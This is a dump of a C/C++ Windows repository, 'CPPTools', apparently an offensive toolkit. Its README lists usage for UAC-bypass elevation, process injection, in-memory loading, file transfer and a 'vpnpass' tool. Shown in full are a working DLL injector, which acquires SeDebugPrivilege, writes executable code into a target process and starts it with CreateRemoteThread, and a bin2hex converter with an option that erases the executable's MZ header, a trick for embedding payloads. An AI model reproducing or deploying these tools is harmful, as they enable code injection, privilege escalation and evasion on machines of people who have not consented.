├── CPPTools.sln ├── README.md ├── bin2hex ├── bin2hex.cpp ├── bin2hex.vcxproj └── bin2hex.vcxproj.filters ├── injectdll ├── injectdll.cpp ├── injectdll.vcxproj ├── injectdll.vcxproj.filters ├── injectlib.cpp └── injectlib.h ├── injectrun ├── injectlib.cpp ├── injectlib.h ├── injectrun.cpp ├── injectrun.vcxproj └── injectrun.vcxproj.filters ├── lcx ├── lcx.c ├── lcx.vcxproj └── lcx.vcxproj.filters ├── memoryload ├── memoryload.cpp ├── memoryload.vcxproj ├── memoryload.vcxproj.filters ├── testexe.h └── testexe64.h ├── recvfile ├── recvfile.c ├── recvfile.vcxproj └── recvfile.vcxproj.filters ├── regsvr32 ├── en-US.rc ├── regsvr32.c ├── regsvr32.rc ├── regsvr32.vcxproj ├── regsvr32.vcxproj.filters └── resource.h ├── removejunk.bat ├── rundll32 ├── lang │ ├── bg-BG.rc │ ├── cs-CZ.rc │ ├── de-DE.rc │ ├── el-GR.rc │ ├── en-US.rc │ ├── es-ES.rc │ ├── fr-FR.rc │ ├── hu-HU.rc │ ├── id-ID.rc │ ├── it-IT.rc │ ├── ja-JP.rc │ ├── lt-LT.rc │ ├── nl-NL.rc │ ├── no-NO.rc │ ├── pl-PL.rc │ ├── pt-BR.rc │ ├── ro-RO.rc │ ├── ru-RU.rc │ ├── sk-SK.rc │ ├── th-TH.rc │ └── uk-UA.rc ├── resource.h ├── rsrc.rc ├── rundll32.c ├── rundll32.rc ├── rundll32.vcxproj └── rundll32.vcxproj.filters ├── sendfile ├── sendfile.c ├── sendfile.vcxproj └── sendfile.vcxproj.filters ├── testdll ├── dllmain.cpp ├── testdll.vcxproj └── testdll.vcxproj.filters ├── testexe ├── testexe.cpp ├── testexe.vcxproj └── testexe.vcxproj.filters ├── uacbypass ├── appinfo.cpp ├── appinfo.h ├── uacbypass.cpp ├── uacbypass.vcxproj └── uacbypass.vcxproj.filters ├── uachijack ├── uachijack.cpp ├── uachijack.vcxproj └── uachijack.vcxproj.filters └── vpnpass ├── vpnpass.cpp ├── vpnpass.vcxproj └── vpnpass.vcxproj.filters /CPPTools.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bin2hex", "bin2hex\bin2hex.vcxproj", "{4B698118-664E-4F37-BDD3-A09F0EE59C00}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vpnpass", "vpnpass\vpnpass.vcxproj", "{F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "uacbypass", "uacbypass\uacbypass.vcxproj", "{FFA55554-6918-4DDF-8D6B-81952FC2E9D3}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "uachijack", "uachijack\uachijack.vcxproj", "{F5593633-8560-4316-BBF2-8CC8D6080843}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lcx", "lcx\lcx.vcxproj", "{A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}" 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "rundll32", "rundll32\rundll32.vcxproj", "{4005499D-84AD-4A74-9EF3-FB137EB54633}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "regsvr32", "regsvr32\regsvr32.vcxproj", "{DEF8432B-7CB9-4973-9B7C-D3500F0735E6}" 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "recvfile", "recvfile\recvfile.vcxproj", "{0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}" 21 | EndProject 22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sendfile", "sendfile\sendfile.vcxproj", "{715D2472-A330-4821-BD4C-3A0844D3A547}" 23 | EndProject 24 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "injectdll", "injectdll\injectdll.vcxproj", "{852EFC89-5C41-4851-B69E-0ACE53DEA651}" 25 | EndProject 26 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testdll", "testdll\testdll.vcxproj", "{FC19169C-E033-4490-8EFB-E3E01BD3DFB8}" 27 | EndProject 28 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "injectrun", "injectrun\injectrun.vcxproj", "{4E98049A-D21B-477E-A801-EE13B47EFCA6}" 29 | EndProject 30 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "memoryload", "memoryload\memoryload.vcxproj", "{0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}" 31 | EndProject 32 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "testexe", "testexe\testexe.vcxproj", "{5410031F-4456-4538-8B90-D2D21C75CE97}" 33 | EndProject 34 | Global 35 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 36 | Debug|x64 = Debug|x64 37 | Debug|x86 = Debug|x86 38 | Release|x64 = Release|x64 39 | Release|x86 = Release|x86 40 | EndGlobalSection 41 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 42 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x64.ActiveCfg = Debug|x64 43 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x64.Build.0 = Debug|x64 44 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x86.ActiveCfg = Debug|Win32 45 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Debug|x86.Build.0 = Debug|Win32 46 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x64.ActiveCfg = Release|x64 47 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x64.Build.0 = Release|x64 48 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x86.ActiveCfg = Release|Win32 49 | {4B698118-664E-4F37-BDD3-A09F0EE59C00}.Release|x86.Build.0 = Release|Win32 50 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x64.ActiveCfg = Debug|x64 51 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x64.Build.0 = Debug|x64 52 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x86.ActiveCfg = Debug|Win32 53 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Debug|x86.Build.0 = Debug|Win32 54 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x64.ActiveCfg = Release|x64 55 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x64.Build.0 = Release|x64 56 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x86.ActiveCfg = Release|Win32 57 | {F000D5E0-2A4F-42B1-95C3-C63FD6B8FE49}.Release|x86.Build.0 = Release|Win32 58 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x64.ActiveCfg = Debug|x64 59 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x64.Build.0 = Debug|x64 60 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x86.ActiveCfg = Debug|Win32 61 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Debug|x86.Build.0 = Debug|Win32 62 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x64.ActiveCfg = Release|x64 63 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x64.Build.0 = Release|x64 64 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x86.ActiveCfg = Release|Win32 65 | {FFA55554-6918-4DDF-8D6B-81952FC2E9D3}.Release|x86.Build.0 = Release|Win32 66 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x64.ActiveCfg = Debug|x64 67 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x64.Build.0 = Debug|x64 68 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x86.ActiveCfg = Debug|Win32 69 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Debug|x86.Build.0 = Debug|Win32 70 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x64.ActiveCfg = Release|x64 71 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x64.Build.0 = Release|x64 72 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x86.ActiveCfg = Release|Win32 73 | {F5593633-8560-4316-BBF2-8CC8D6080843}.Release|x86.Build.0 = Release|Win32 74 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x64.ActiveCfg = Debug|x64 75 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x64.Build.0 = Debug|x64 76 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x86.ActiveCfg = Debug|Win32 77 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Debug|x86.Build.0 = Debug|Win32 78 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x64.ActiveCfg = Release|x64 79 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x64.Build.0 = Release|x64 80 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x86.ActiveCfg = Release|Win32 81 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64}.Release|x86.Build.0 = Release|Win32 82 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x64.ActiveCfg = Debug|x64 83 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x64.Build.0 = Debug|x64 84 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x86.ActiveCfg = Debug|Win32 85 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Debug|x86.Build.0 = Debug|Win32 86 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x64.ActiveCfg = Release|x64 87 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x64.Build.0 = Release|x64 88 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x86.ActiveCfg = Release|Win32 89 | {4005499D-84AD-4A74-9EF3-FB137EB54633}.Release|x86.Build.0 = Release|Win32 90 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x64.ActiveCfg = Debug|x64 91 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x64.Build.0 = Debug|x64 92 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x86.ActiveCfg = Debug|Win32 93 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Debug|x86.Build.0 = Debug|Win32 94 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x64.ActiveCfg = Release|x64 95 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x64.Build.0 = Release|x64 96 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x86.ActiveCfg = Release|Win32 97 | {DEF8432B-7CB9-4973-9B7C-D3500F0735E6}.Release|x86.Build.0 = Release|Win32 98 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x64.ActiveCfg = Debug|x64 99 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x64.Build.0 = Debug|x64 100 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x86.ActiveCfg = Debug|Win32 101 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Debug|x86.Build.0 = Debug|Win32 102 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x64.ActiveCfg = Release|x64 103 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x64.Build.0 = Release|x64 104 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x86.ActiveCfg = Release|Win32 105 | {0512D90E-7D7A-4FD6-B05A-3E172C2F24A9}.Release|x86.Build.0 = Release|Win32 106 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x64.ActiveCfg = Debug|x64 107 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x64.Build.0 = Debug|x64 108 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x86.ActiveCfg = Debug|Win32 109 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Debug|x86.Build.0 = Debug|Win32 110 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x64.ActiveCfg = Release|x64 111 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x64.Build.0 = Release|x64 112 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x86.ActiveCfg = Release|Win32 113 | {715D2472-A330-4821-BD4C-3A0844D3A547}.Release|x86.Build.0 = Release|Win32 114 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x64.ActiveCfg = Debug|x64 115 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x64.Build.0 = Debug|x64 116 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x86.ActiveCfg = Debug|Win32 117 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Debug|x86.Build.0 = Debug|Win32 118 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x64.ActiveCfg = Release|x64 119 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x64.Build.0 = Release|x64 120 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x86.ActiveCfg = Release|Win32 121 | {852EFC89-5C41-4851-B69E-0ACE53DEA651}.Release|x86.Build.0 = Release|Win32 122 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x64.ActiveCfg = Debug|x64 123 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x64.Build.0 = Debug|x64 124 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x86.ActiveCfg = Debug|Win32 125 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Debug|x86.Build.0 = Debug|Win32 126 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x64.ActiveCfg = Release|x64 127 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x64.Build.0 = Release|x64 128 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x86.ActiveCfg = Release|Win32 129 | {FC19169C-E033-4490-8EFB-E3E01BD3DFB8}.Release|x86.Build.0 = Release|Win32 130 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x64.ActiveCfg = Debug|x64 131 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x64.Build.0 = Debug|x64 132 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x86.ActiveCfg = Debug|Win32 133 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Debug|x86.Build.0 = Debug|Win32 134 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x64.ActiveCfg = Release|x64 135 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x64.Build.0 = Release|x64 136 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x86.ActiveCfg = Release|Win32 137 | {4E98049A-D21B-477E-A801-EE13B47EFCA6}.Release|x86.Build.0 = Release|Win32 138 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x64.ActiveCfg = Debug|x64 139 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x64.Build.0 = Debug|x64 140 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x86.ActiveCfg = Debug|Win32 141 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Debug|x86.Build.0 = Debug|Win32 142 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x64.ActiveCfg = Release|x64 143 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x64.Build.0 = Release|x64 144 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x86.ActiveCfg = Release|Win32 145 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711}.Release|x86.Build.0 = Release|Win32 146 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x64.ActiveCfg = Debug|x64 147 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x64.Build.0 = Debug|x64 148 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x86.ActiveCfg = Debug|Win32 149 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Debug|x86.Build.0 = Debug|Win32 150 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x64.ActiveCfg = Release|x64 151 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x64.Build.0 = Release|x64 152 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x86.ActiveCfg = Release|Win32 153 | {5410031F-4456-4538-8B90-D2D21C75CE97}.Release|x86.Build.0 = Release|Win32 154 | EndGlobalSection 155 | GlobalSection(SolutionProperties) = preSolution 156 | HideSolutionNode = FALSE 157 | EndGlobalSection 158 | EndGlobal 159 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CPPTools 2 | 3 | ### bin2hex 4 | bin2hex.exe infile outfile [name [-ClearMZ]] 5 | 6 | ### injectdll 7 | injectdll.exe pid dll_full_path [func] 8 | 9 | ### injectrun 10 | injectrun.exe pid cmdline 11 | 12 | ### memoryload(demo) 13 | memoryload.exe cmdline 14 | 15 | ### recvfile&sendfile 16 | recvfile.exe listenport 17 | sendfile.exe ip:port filepath 18 | 19 | ### uacbypass 20 | uacbypass.exe -list //get app item list 21 | uacbypass.exe -exp index //use app index to elevate 22 | 23 | ### vpnpass 24 | vpnpass.exe user //run as administrator 25 | -------------------------------------------------------------------------------- /bin2hex/bin2hex.cpp: -------------------------------------------------------------------------------- 1 | // bin2hex.cpp : Defines the entry point for the console application. 2 | // 3 | #include 4 | #include 5 | #include 6 | 7 | 8 | BOOL ClearMZ(const TCHAR* lpszFilename) 9 | { 10 | BOOL bRet = FALSE; 11 | CHAR szDosHeader[] = { 0x00, 0x00 }; 12 | DWORD dwWritten = 0; 13 | HANDLE hFile = NULL; 14 | hFile = CreateFile(lpszFilename, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); 15 | if (hFile == INVALID_HANDLE_VALUE) 16 | return bRet; 17 | SetFilePointer(hFile, 0, NULL, FILE_BEGIN); 18 | bRet = WriteFile(hFile, szDosHeader, 2, &dwWritten, NULL); 19 | CloseHandle(hFile); 20 | return bRet; 21 | } 22 | 23 | int main( int argc, char* argv[] ) 24 | { 25 | FILE* fin = NULL; 26 | FILE* fout = NULL; 27 | char* nameVar = "data"; 28 | int c = 0; 29 | int n = 0; 30 | 31 | if(argc < 3) 32 | { 33 | printf("bin2hex.exe 'infile' 'outfile' 'name' [-ClearMZ]"); 34 | return 0; 35 | } 36 | 37 | if (argc > 3) 38 | nameVar = argv[3]; 39 | if (argc > 4 && stricmp(argv[4], "-ClearMZ") == 0) 40 | ClearMZ(argv[1]); 41 | 42 | fin = fopen(argv[1], "rb"); 43 | if(fin == NULL) 44 | { 45 | printf("not open file %s", argv[1]); 46 | return 0; 47 | } 48 | 49 | fout = fopen(argv[2], "w"); 50 | if(fout == NULL) 51 | { 52 | printf("not create file %s", argv[2]); 53 | return 0; 54 | } 55 | 56 | fprintf(fout, "unsigned char %s[] =\n{", nameVar); 57 | 58 | while((c = fgetc(fin)) >= 0) 59 | { 60 | if(n > 0) 61 | fprintf(fout, ", "); 62 | if((n % 16) == 0) 63 | fprintf(fout, "\n\t"); 64 | fprintf(fout, "0x%02x", c); 65 | n++; 66 | } 67 | 68 | fprintf(fout, "\n};\n" ); 69 | fclose(fout); 70 | fclose(fin); 71 | 72 | return 1; 73 | } 74 | -------------------------------------------------------------------------------- /bin2hex/bin2hex.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {4B698118-664E-4F37-BDD3-A09F0EE59C00} 23 | Win32Proj 24 | bin2hex 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /bin2hex/bin2hex.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /injectdll/injectdll.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "injectlib.h" 6 | 7 | typedef HMODULE(WINAPI *typeLoadLibrary)(LPCSTR); 8 | typedef BOOL(WINAPI *typeFreeLibrary)(HMODULE hLibModule); 9 | typedef FARPROC(WINAPI *typeGetProcAddress)(HMODULE, LPCSTR); 10 | typedef void (WINAPI *typeFunc)(void); 11 | 12 | struct FuncInfo 13 | { 14 | typeLoadLibrary LoadLibrary; 15 | typeFreeLibrary FreeLibrary; 16 | typeGetProcAddress GetProcAddress; 17 | char dll[MAX_PATH]; 18 | char func[16]; 19 | }; 20 | 21 | void* AllocMemory(HANDLE process, void* address, int size) 22 | { 23 | void* addr = VirtualAllocEx(process, 0, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 24 | if (addr == NULL) 25 | return NULL; 26 | if (!WriteProcessMemory(process, addr, address, size, 0)) 27 | return NULL; 28 | return addr; 29 | } 30 | 31 | DWORD WINAPI MyFunc(FuncInfo* info) 32 | { 33 | HMODULE dll = info->LoadLibrary(info->dll); 34 | if (dll) 35 | { 36 | typeFunc func = (typeFunc)info->GetProcAddress(dll, info->func); 37 | if (func) 38 | func(); 39 | } 40 | info->FreeLibrary(dll); 41 | return 0; 42 | } 43 | 44 | int WINAPI EndFunc() 45 | { 46 | return 0; 47 | } 48 | 49 | void InjectDLL(const char* pid, const char* pathDll, const char* func) 50 | { 51 | bool res = false; 52 | FuncInfo info; 53 | strcpy(info.dll, pathDll); 54 | if(func) 55 | strcpy(info.func, func); 56 | 57 | HMODULE kernel = GetModuleHandleA("kernel32.dll"); 58 | info.LoadLibrary = (typeLoadLibrary)GetProcAddress(kernel, "LoadLibraryA"); 59 | info.GetProcAddress = (typeGetProcAddress)GetProcAddress(kernel, "GetProcAddress"); 60 | info.FreeLibrary = (typeFreeLibrary)GetProcAddress(kernel, "FreeLibrary"); 61 | 62 | HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(pid)); 63 | if (process) 64 | { 65 | void* ptr_func = AllocMemory(process, &MyFunc, int(EndFunc) - int(MyFunc)); 66 | void* ptr_info = AllocMemory(process, &info, sizeof(info)); 67 | HANDLE thread = _CreateRemoteThread(process, 0, 0, (LPTHREAD_START_ROUTINE)ptr_func, ptr_info, 0, 0); 68 | if (thread == 0) 69 | printf("CreateRemoteThread failed (err = %d)\n", GetLastError()); 70 | else 71 | { 72 | CloseHandle(thread); 73 | printf("dll injected in process[%s]\n", pid); 74 | res = true; 75 | } 76 | } 77 | else 78 | printf("OpenProcess failed, err = %d", GetLastError()); 79 | } 80 | 81 | BOOL EnableProcessPrivilege(HANDLE hProcess, PCHAR pstrPrivilege, BOOL bEnable) 82 | { 83 | HANDLE hToken = NULL; 84 | TOKEN_PRIVILEGES tp = { 0 }; 85 | if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 86 | return FALSE; 87 | tp.PrivilegeCount = 1; 88 | if (!LookupPrivilegeValue(NULL, pstrPrivilege, &tp.Privileges[0].Luid)) 89 | { 90 | CloseHandle(hToken); 91 | return FALSE; 92 | } 93 | if (bEnable) 94 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 95 | else 96 | tp.Privileges[0].Attributes = 0; 97 | if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) 98 | { 99 | CloseHandle(hToken); 100 | return FALSE; 101 | } 102 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) 103 | { 104 | CloseHandle(hToken); 105 | return FALSE; 106 | } 107 | CloseHandle(hToken); 108 | return TRUE; 109 | } 110 | 111 | int main(int argc, char* argv[]) 112 | { 113 | if (argc !=3 && argc != 4) 114 | { 115 | printf("Usage:\n\tinjectdll.exe pid dllpath [func]"); 116 | return 0; 117 | } 118 | 119 | EnableProcessPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE); 120 | if (argc == 3) 121 | InjectDLL(argv[1], argv[2], NULL); 122 | if (argc == 4) 123 | InjectDLL(argv[1], argv[2], argv[3]); 124 | 125 | return 1; 126 | } 127 | -------------------------------------------------------------------------------- /injectdll/injectdll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {852EFC89-5C41-4851-B69E-0ACE53DEA651} 23 | Win32Proj 24 | injectdll 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /injectdll/injectdll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 